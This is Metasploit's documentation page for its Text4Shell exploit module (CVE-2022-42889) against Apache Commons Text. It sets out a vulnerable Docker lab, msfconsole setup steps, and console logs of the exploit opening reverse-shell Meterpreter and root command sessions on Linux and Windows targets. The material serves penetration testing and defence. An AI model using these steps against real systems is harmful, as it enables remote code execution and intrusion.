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GitHub Repository: rapid7/metasploit-framework
Path: blob/master/documentation/modules/exploit/multi/http/
Views: 1904

Vulnerable Application

This exploit takes advantage of the StringSubstitutor interpolator class, which is included in the Commons Text library. A default interpolator allows for string lookups that can lead to Remote Code Execution. This is due to a logic flaw that makes the “script”, “dns” and “url” lookup keys interpolated by default, as opposed to what it should be, according to the documentation of the StringLookupFactory class. Those keys allow an attacker to execute arbitrary code via lookups primarily using the "script" key.

In order to exploit the vulnerabilities, the following requirements must be met:

Run a version of Apache Commons Text from version 1.5 to 1.9 Use the StringSubstitutor interpolator Target should run JDK < 15


  1. git clone

  2. cd cve-2022-42889-text4shell-docker

  3. mvn clean install

  4. docker build --tag=text4shell .

  5. docker run -p 80:8080 text4shell

  6. Vulnerable application now running at port 8080 on docker image's ip address

Verification Steps

  1. Setup the application

  2. Start msfconsole

  3. Do: use apache_commons_text4shell

  4. Do: set RHOST <docker ip>

  5. Do: set RPORT 8080

  6. Do: set TARGETURI /text4shell/attack

  7. Do: set PARAM search

  8. Do: set LHOST docker0

  9. Do: run



The parameter vulnerable to the exploit.


The HTTP method to use. Default: GET


The URI to target. Default: /


Apache Commons Text 1.8 on Alpine Linux v3.9 JDK 8


msf6 > use exploit/multi/http/apache_commons_text4shell [*] Using configured payload java/meterpreter/reverse_tcp msf6 exploit(multi/http/apache_commons_text4shell) > set lhost docker0 lhost => msf6 exploit(multi/http/apache_commons_text4shell) > set rhost rhost => msf6 exploit(multi/http/apache_commons_text4shell) > set rport 8080 rport => 8080 msf6 exploit(multi/http/apache_commons_text4shell) > set targeturi /text4shell/attack targeturi => /text4shell/attack msf6 exploit(multi/http/apache_commons_text4shell) > set param search param => search msf6 exploit(multi/http/apache_commons_text4shell) > check [+] - The target is vulnerable. Successfully tested command injection.

Target: java

msf6 exploit(multi/http/apache_commons_text4shell) > set target 0 target => 0 msf6 exploit(multi/http/apache_commons_text4shell) > run [*] Started reverse TCP handler on [*] Using URL: [*] Sending stage (57692 bytes) to [*] Meterpreter session 16 opened ( -> at 2023-12-23 23:03:31 +0530 [*] Server stopped. meterpreter >

Target: Linux Command

msf6 exploit(multi/http/apache_commons_text4shell) > set target 3 target => 3 msf6 exploit(multi/http/apache_commons_text4shell) > run [*] Started reverse TCP handler on [*] Command shell session 17 opened ( -> at 2023-12-23 23:04:10 +0530 id uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel),11(floppy),20(dialout),26(tape),27(video)

Target: Linux Dropper

msf6 exploit(multi/http/apache_commons_text4shell) > set target 4 target => 4 msf6 exploit(multi/http/apache_commons_text4shell) > run [*] Started reverse TCP handler on [*] Using URL: [*] Client requested /L8kRU1E8O/ [*] Sending payload to [*] Sending stage (3045380 bytes) to [*] Command Stager progress - 100.00% done (113/113 bytes) [*] Meterpreter session 18 opened ( -> at 2023-12-23 23:04:35 +0530 [*] Server stopped. meterpreter >

Apache Commons Text 1.8 on Windows 11 home JDK 14.0.2

Target: Windows EXE Dropper

msf6 exploit(multi/http/apache_commons_text4shell) > options Module options (exploit/multi/http/apache_commons_text4shell): Name Current Setting Required Description ---- --------------- -------- ----------- METHOD GET yes The HTTP method to use (Accepted: GET, POST) PARAM search yes The vulnerable parameter Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI text4shell/attack yes The target URI URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST yes The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses. SRVPORT 5000 yes The local port to listen on. Payload options (windows/x64/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 1 Windows EXE Dropper View the full module info with the info, or info -d command. msf6 exploit(multi/http/apache_commons_text4shell) > run [*] Started reverse TCP handler on [*] Command Stager progress - 17.01% done (2046/12025 bytes) [*] Command Stager progress - 34.03% done (4092/12025 bytes) [*] Command Stager progress - 51.04% done (6138/12025 bytes) [*] Command Stager progress - 68.06% done (8184/12025 bytes) [*] Command Stager progress - 84.24% done (10130/12025 bytes) [*] Sending stage (200774 bytes) to [*] Command Stager progress - 100.00% done (12025/12025 bytes) [*] Meterpreter session 5 opened ( -> at 2024-01-15 00:14:33 +0530 meterpreter > sysinfo Computer : HOME OS : Windows 11 (10.0 Build 22631). Architecture : x64 System Language : en_GB Domain : WORKGROUP Logged On Users : 2 Meterpreter : x64/windows meterpreter >

Target: Windows Command

msf6 exploit(multi/http/apache_commons_text4shell) > options Module options (exploit/multi/http/apache_commons_text4shell): Name Current Setting Required Description ---- --------------- -------- ----------- METHOD GET yes The HTTP method to use (Accepted: GET, POST) PARAM search yes The vulnerable parameter Proxies no A proxy chain of format type:host:port[,type:host:port][...] RHOSTS yes The target host(s), see RPORT 8080 yes The target port (TCP) SSL false no Negotiate SSL/TLS for outgoing connections SSLCert no Path to a custom SSL certificate (default is randomly generated) TARGETURI text4shell/attack yes The target URI URIPATH no The URI to use for this exploit (default is random) VHOST no HTTP server virtual host When CMDSTAGER::FLAVOR is one of auto,tftp,wget,curl,fetch,lwprequest,psh_invokewebrequest,ftp_http: Name Current Setting Required Description ---- --------------- -------- ----------- SRVHOST yes The local host or network interface to listen on. This must be an address on the local machine or to listen on all addresses. SRVPORT 5000 yes The local port to listen on. Payload options (cmd/windows/powershell/meterpreter/reverse_tcp): Name Current Setting Required Description ---- --------------- -------- ----------- EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none) LHOST yes The listen address (an interface may be specified) LPORT 4444 yes The listen port Exploit target: Id Name -- ---- 2 Windows Command View the full module info with the info, or info -d command. msf6 exploit(multi/http/apache_commons_text4shell) > run [*] Started reverse TCP handler on [*] Sending stage (175686 bytes) to [*] Meterpreter session 6 opened ( -> at 2024-01-15 00:15:18 +0530 meterpreter > sysinfo Computer : HOME OS : Windows 11 (10.0 Build 22631). Architecture : x64 System Language : en_GB Domain : WORKGROUP Logged On Users : 2 Meterpreter : x86/windows meterpreter >```